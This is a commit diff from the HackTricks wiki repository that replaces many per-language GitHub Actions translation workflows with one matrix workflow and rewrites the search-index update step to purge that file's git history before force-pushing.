Merge branch 'master' into update_Hunting_Vulnerabilities_in_Keras_Model_Deserializa_20250820_124658

SirBroccoli 2025-08-21 14:48:04 +02:00 committed by GitHub
commit 3227cd6089
38 changed files with 1946 additions and 1813 deletions

View File

@ -26,19 +26,6 @@ jobs:
environment: prod
steps:
- name: Free Disk Space (Ubuntu)
uses: jlumbroso/free-disk-space@main
with:
# this might remove tools that are actually needed,
# when set to "true" but frees about 6 GB
tool-cache: true
- name: Clean space
run: |
echo "Cleaning space"
sudo rm -rf "/usr/local/share/boost"
sudo rm -rf "$AGENT_TOOLSDIRECTORY"
- name: Checkout code
uses: actions/checkout@v4
with:
@ -48,21 +35,61 @@ jobs:
- name: Build mdBook
run: MDBOOK_BOOK__LANGUAGE=en mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex in repo
- name: Update searchindex in repo (purge history, keep current on HEAD)
shell: bash
run: |
set -euo pipefail
ls -la
ls -la book
git config --global --add safe.directory /__w/hacktricks/hacktricks
git pull
git config --global user.email "build@example.com"
git config --global user.name "Build master"
git config pull.rebase false
# Ensure we're on the target branch and up to date
git pull --ff-only
# Choose the file to keep at HEAD:
# 1) Prefer freshly built version from book/
# 2) Fallback to the file currently at HEAD (if it exists)
HAS_FILE=0
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
cp "book/searchindex.js" /tmp/sidx.js
HAS_FILE=1
elif git cat-file -e "HEAD:searchindex.js" 2>/dev/null; then
git show "HEAD:searchindex.js" > /tmp/sidx.js
HAS_FILE=1
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Skip if there's nothing to purge AND nothing to keep
if [ "$HAS_FILE" = "1" ] || git rev-list -n 1 HEAD -- "searchindex.js" >/dev/null 2>&1; then
# Fail early if working tree is dirty (avoid confusing rewrites)
git diff --quiet || { echo "Working tree has uncommitted changes; aborting purge." >&2; exit 1; }
# Install git-filter-repo and ensure it's on PATH
python -m pip install --quiet --user git-filter-repo
export PATH="$HOME/.local/bin:$PATH"
# Rewrite ONLY the current branch, dropping all historical blobs of searchindex.js
git filter-repo --force --path "searchindex.js" --invert-paths --refs "$(git symbolic-ref -q HEAD)"
# Re-add the current version on top of rewritten history (keep it in HEAD)
if [ "$HAS_FILE" = "1" ]; then
mv /tmp/sidx.js "searchindex.js"
git add "searchindex.js"
git commit -m "Update searchindex (purged history; keep current)"
else
echo "No current searchindex.js to re-add after purge."
fi
# Safer force push (only updates if remote hasn't advanced)
git push --force-with-lease
else
echo "Nothing to purge; skipping."
fi
# Log in to AWS
- name: Configure AWS credentials using OIDC

View File

@ -1,100 +0,0 @@
name: Translator to AF (Afrikaans)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: af
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Afrikaans
BRANCH: af
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

.github/workflows/translate_all.yml (new file, 193 lines)
View File

@ -0,0 +1,193 @@
name: Translate All
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
permissions:
packages: write
id-token: write
contents: write
jobs:
translate:
name: Translate → ${{ matrix.name }} (${{ matrix.branch }})
runs-on: ubuntu-latest
# Run N languages in parallel (tune max-parallel if needed)
strategy:
fail-fast: false
# max-parallel: 3  # left commented so all languages run in parallel
matrix:
include:
- { name: "Afrikaans", language: "Afrikaans", branch: "af" }
- { name: "German", language: "German", branch: "de" }
- { name: "Greek", language: "Greek", branch: "el" }
- { name: "Spanish", language: "Spanish", branch: "es" }
- { name: "French", language: "French", branch: "fr" }
- { name: "Hindi", language: "Hindi", branch: "hi" }
- { name: "Italian", language: "Italian", branch: "it" }
- { name: "Japanese", language: "Japanese", branch: "ja" }
- { name: "Korean", language: "Korean", branch: "ko" }
- { name: "Polish", language: "Polish", branch: "pl" }
- { name: "Portuguese", language: "Portuguese", branch: "pt" }
- { name: "Serbian", language: "Serbian", branch: "sr" }
- { name: "Swahili", language: "Swahili", branch: "sw" }
- { name: "Turkish", language: "Turkish", branch: "tr" }
- { name: "Ukrainian", language: "Ukrainian", branch: "uk" }
- { name: "Chinese", language: "Chinese", branch: "zh" }
# Ensure only one job per branch runs at a time (even across workflow runs)
concurrency:
group: translate-cloud-${{ matrix.branch }}
cancel-in-progress: false
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
env:
LANGUAGE: ${{ matrix.language }}
BRANCH: ${{ matrix.branch }}
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Update and download scripts
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget -O get_and_save_refs.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/scripts/get_and_save_refs.py
wget -O compare_and_fix_refs.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/scripts/compare_and_fix_refs.py
wget -O translator.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run get_and_save_refs.py
run: |
python scripts/get_and_save_refs.py
- name: Download language branch & update refs
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
python scripts/compare_and_fix_refs.py --files-unmatched-paths /tmp/file_paths.txt
git add .
git commit -m "Fix unmatched refs" || echo "No changes to commit"
git push || echo "No changes to push"
- name: Run translation script on changed files
run: |
git checkout master
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
touch /tmp/file_paths.txt
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n ",$file" >> /tmp/file_paths.txt
fi
done
echo "Files to translate:"
cat /tmp/file_paths.txt
echo ""
echo ""
if [ -s /tmp/file_paths.txt ]; then
python scripts/translator.py \
--language "$LANGUAGE" \
--branch "$BRANCH" \
--api-key "$OPENAI_API_KEY" \
-f "$(cat /tmp/file_paths.txt)" \
-t 3
else
echo "No markdown files changed, skipping translation."
fi
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo (purge history, keep current on HEAD)
shell: bash
run: |
set -euo pipefail
# Be explicit about workspace trust (avoids "dubious ownership")
git config --global --add safe.directory "$GITHUB_WORKSPACE"
git checkout "$BRANCH"
git fetch origin "$BRANCH" --quiet
git pull --ff-only
# Choose the file to keep at HEAD:
# 1) Prefer freshly built version from book/
# 2) Fallback to the file currently at HEAD (if it exists)
HAS_FILE=0
if [ -f "book/searchindex.js" ]; then
cp "book/searchindex.js" /tmp/sidx.js
HAS_FILE=1
elif git cat-file -e "HEAD:searchindex.js" 2>/dev/null; then
git show "HEAD:searchindex.js" > /tmp/sidx.js
HAS_FILE=1
fi
# Skip if there's nothing to purge AND nothing to keep
if [ "$HAS_FILE" = "1" ] || git rev-list -n 1 "$BRANCH" -- "searchindex.js" >/dev/null 2>&1; then
# **Fail early if working tree is dirty** (prevents confusing filter results)
git diff --quiet || { echo "Working tree has uncommitted changes; aborting purge." >&2; exit 1; }
# Make sure git-filter-repo is callable via `git filter-repo`
python -m pip install --quiet --user git-filter-repo
export PATH="$HOME/.local/bin:$PATH"
# Rewrite ONLY this branch, dropping all historical blobs of searchindex.js
git filter-repo --force --path "searchindex.js" --invert-paths --refs "refs/heads/$BRANCH"
# Re-add the current version on top of rewritten history (keep it in HEAD)
if [ "$HAS_FILE" = "1" ]; then
mv /tmp/sidx.js "searchindex.js"
git add "searchindex.js"
git commit -m "Update searchindex (purged history; keep current)"
else
echo "No current searchindex.js to re-add after purge."
fi
# **Safer force push** (prevents clobbering unexpected remote updates)
git push --force-with-lease origin "$BRANCH"
else
echo "Nothing to purge; skipping."
fi
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to DE (German)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: de
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: German
BRANCH: de
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to EL (Greek)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: el
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Greek
BRANCH: el
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to ES (Spanish)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: es
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Spanish
BRANCH: es
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to FR (French)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: fr
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: French
BRANCH: fr
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to HI (Hindi)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: hi
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Hindi
BRANCH: hi
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to IT (Italian)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: it
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Italian
BRANCH: it
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to JA (Japanese)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: ja
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Japanese
BRANCH: ja
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
echo "Cat 3 files from the book"
find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat

View File

@ -1,100 +0,0 @@
name: Translator to KO (Korean)
on:
push:
branches:
- master
paths-ignore:
- 'scripts/**'
- '.gitignore'
- '.github/**'
- Dockerfile
workflow_dispatch:
concurrency: ko
permissions:
packages: write
id-token: write
contents: write
jobs:
run-translation:
runs-on: ubuntu-latest
container:
image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest
environment: prod
env:
LANGUAGE: Korean
BRANCH: ko
steps:
- name: Checkout code
uses: actions/checkout@v2
with:
fetch-depth: 0
- name: Download language branch
run: |
git config --global --add safe.directory /__w/hacktricks/hacktricks
git config --global user.name 'Translator'
git config --global user.email 'github-actions@github.com'
git config pull.rebase false
git checkout $BRANCH
git pull
git checkout master
- name: Update & install translator.py (if needed)
run: |
sudo apt-get update
sudo apt-get install wget -y
mkdir scripts
cd scripts
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
cd ..
- name: Run translation script on changed files
run: |
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
if echo "$file" | grep -qE '\.md$'; then
echo -n "$file , " >> /tmp/file_paths.txt
fi
done
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
- name: Build mdBook
run: |
git checkout "$BRANCH"
git pull
MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1)
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
git pull
if [ -f "book/searchindex.js" ]; then
cp book/searchindex.js searchindex.js
fi
(git add searchindex.js;
git commit -m "Update searchindex";
git push) || echo "No changes to searchindex.js"
# Log in to AWS
- name: Configure AWS credentials using OIDC
uses: aws-actions/configure-aws-credentials@v3
with:
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
aws-region: us-east-1
# Sync the build to S3
- name: Sync to S3
run: |
echo "Current branch:"
git rev-parse --abbrev-ref HEAD
echo "Syncing $BRANCH to S3"
aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
echo "Sync completed"
